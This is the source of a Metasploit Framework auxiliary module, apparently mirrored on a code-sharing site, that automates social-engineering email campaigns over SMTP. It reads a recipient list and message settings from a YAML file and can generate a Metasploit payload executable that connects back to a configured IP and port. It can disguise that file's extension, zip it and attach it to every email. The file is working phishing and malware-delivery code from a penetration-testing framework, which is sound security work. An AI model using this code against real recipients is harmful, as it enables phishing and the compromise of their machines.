Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/client/smtp/emailer.rb
19721 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'yaml'
7
8
class MetasploitModule < Msf::Auxiliary
9
10
#
11
# This module sends email messages via smtp
12
#
13
include Msf::Exploit::Remote::SMTPDeliver
14
include Msf::Exploit::EXE
15
16
def initialize(info = {})
17
super(
18
update_info(
19
info,
20
'Name' => 'Generic Emailer (SMTP)',
21
'Description' => %q{
22
This module can be used to automate email delivery.
23
This code is based on Joshua Abraham's email script for social
24
engineering.
25
},
26
'License' => MSF_LICENSE,
27
'References' => [
28
[ 'URL', 'http://spl0it.org/' ],
29
],
30
'Author' => [ 'et <et[at]metasploit.com>' ],
31
'Notes' => {
32
'Stability' => [CRASH_SAFE],
33
'SideEffects' => [],
34
'Reliability' => []
35
}
36
)
37
)
38
39
register_options(
40
[
41
OptString.new('RHOST', [true, 'SMTP server address', '127.0.0.1']),
42
OptPort.new('RPORT', [true, 'SMTP server port', 25]),
43
OptString.new('YAML_CONFIG', [
44
true, 'Full path to YAML Configuration file',
45
File.join(Msf::Config.data_directory, 'emailer_config.yaml')
46
]),
47
]
48
)
49
50
# Hide this option from the user
51
deregister_options('MAILTO')
52
deregister_options('SUBJECT')
53
end
54
55
def load_yaml_conf
56
opts = {}
57
58
File.open(datastore['YAML_CONFIG'], 'rb') do |f|
59
yamlconf = YAML.safe_load(f)
60
61
opts['to'] = yamlconf['to']
62
opts['from'] = yamlconf['from']
63
opts['subject'] = yamlconf['subject']
64
opts['type'] = yamlconf['type']
65
opts['msg_file'] = yamlconf['msg_file']
66
opts['wait'] = yamlconf['wait']
67
opts['add_name'] = yamlconf['add_name']
68
opts['sig'] = yamlconf['sig']
69
opts['sig_file'] = yamlconf['sig_file']
70
opts['attachment'] = yamlconf['attachment']
71
opts['attachment_file'] = yamlconf['attachment_file']
72
opts['attachment_file_type'] = yamlconf['attachment_file_type']
73
opts['attachment_file_name'] = yamlconf['attachment_file_name']
74
75
### payload options ###
76
opts['make_payload'] = yamlconf['make_payload']
77
opts['zip_payload'] = yamlconf['zip_payload']
78
opts['msf_port'] = yamlconf['msf_port']
79
opts['msf_ip'] = yamlconf['msf_ip']
80
opts['msf_payload'] = yamlconf['msf_payload']
81
opts['msf_filename'] = yamlconf['msf_filename']
82
opts['msf_change_ext'] = yamlconf['msf_change_ext']
83
opts['msf_payload_ext'] = yamlconf['msf_payload_ext']
84
end
85
86
opts
87
end
88
89
def load_file(fname)
90
buf = ''
91
File.open(fname, 'rb') do |f|
92
buf = f.read
93
end
94
95
buf
96
end
97
98
def run
99
yamlconf = load_yaml_conf
100
101
fileto = yamlconf['to']
102
from = yamlconf['from']
103
subject = yamlconf['subject']
104
type = yamlconf['type']
105
msg_file = yamlconf['msg_file']
106
wait = yamlconf['wait']
107
add_name = yamlconf['add_name']
108
sig = yamlconf['sig']
109
sig_file = yamlconf['sig_file']
110
attachment = yamlconf['attachment']
111
attachment_file = yamlconf['attachment_file']
112
attachment_file_type = yamlconf['attachment_file_type']
113
attachment_file_name = yamlconf['attachment_file_name']
114
115
make_payload = yamlconf['make_payload']
116
zip_payload = yamlconf['zip_payload']
117
msf_port = yamlconf['msf_port']
118
msf_ip = yamlconf['msf_ip']
119
msf_payload = yamlconf['msf_payload']
120
msf_filename = yamlconf['msf_filename']
121
msf_change_ext = yamlconf['msf_change_ext']
122
msf_payload_ext = yamlconf['msf_payload_ext']
123
124
tmp = Dir.tmpdir
125
126
datastore['MAILFROM'] = from
127
128
msg = load_file(msg_file)
129
130
if type !~ /text/i && type !~ %r{text/html}i
131
print_error("YAML config: #{type}")
132
end
133
134
if make_payload
135
attachment_file = File.join(tmp, msf_filename)
136
attachment_file_name = msf_filename
137
138
print_status('Creating payload...')
139
mod = framework.payloads.create(msf_payload)
140
if !mod
141
print_error("Failed to create payload, #{msf_payload}")
142
return
143
end
144
145
# By not passing an explicit encoder, we're asking the
146
# framework to pick one for us. In general this is the best
147
# way to encode.
148
buf = mod.generate_simple(
149
'Format' => 'raw',
150
'Options' => { 'LHOST' => msf_ip, 'LPORT' => msf_port }
151
)
152
exe = generate_payload_exe({
153
code: buf,
154
arch: mod.arch,
155
platform: mod.platform
156
})
157
158
print_status("Writing payload to #{attachment_file}")
159
File.open(attachment_file, 'wb') do |f|
160
f.write(exe)
161
end
162
163
if msf_change_ext
164
msf_payload_newext = attachment_file
165
msf_payload_newext = msf_payload_newext.sub(/\.\w+$/, ".#{msf_payload_ext}")
166
File.rename(attachment_file, msf_payload_newext)
167
attachment_file = msf_payload_newext
168
end
169
170
if zip_payload
171
zip_file = attachment_file.sub(/\.\w+$/, '.zip')
172
print_status("Zipping payload to #{zip_file}")
173
File.write(zip_file, Msf::Util::EXE.to_zip([fname: File.basename(attachment_file), data: exe]), mode: 'wb')
174
attachment_file = zip_file
175
attachment_file_type = 'application/zip'
176
else
177
attachment_file_type = 'application/exe'
178
end
179
180
end
181
182
File.open(fileto, 'rb').each do |l|
183
next if l !~ /@/
184
185
nem = l.split(',')
186
name = nem[0].split(' ')
187
fname = name[0]
188
_lname = name[1]
189
email = nem[1].strip
190
191
if add_name
192
email_msg_body = "#{fname},\n\n#{msg}"
193
else
194
email_msg_body = msg
195
end
196
197
if sig
198
data_sig = load_file(sig_file)
199
email_msg_body = "#{email_msg_body}\n#{data_sig}"
200
end
201
202
print_status("Emailing #{name[0]} #{name[1]} at #{email}")
203
204
mime_msg = Rex::MIME::Message.new
205
mime_msg.mime_defaults
206
207
mime_msg.from = from
208
mime_msg.to = email
209
datastore['MAILTO'] = email.strip
210
mime_msg.subject = subject
211
212
mime_msg.add_part(Rex::Text.encode_base64(email_msg_body, "\r\n"), type, 'base64', 'inline')
213
214
if attachment && attachment_file_name
215
data_attachment = load_file(attachment_file)
216
mime_msg.add_part(Rex::Text.encode_base64(data_attachment, "\r\n"), attachment_file_type, 'base64', "attachment; filename=\"#{attachment_file_name}\"")
217
end
218
219
send_message(mime_msg.to_s)
220
select(nil, nil, nil, wait)
221
end
222
223
print_status('Email sent..')
224
end
225
end
226
227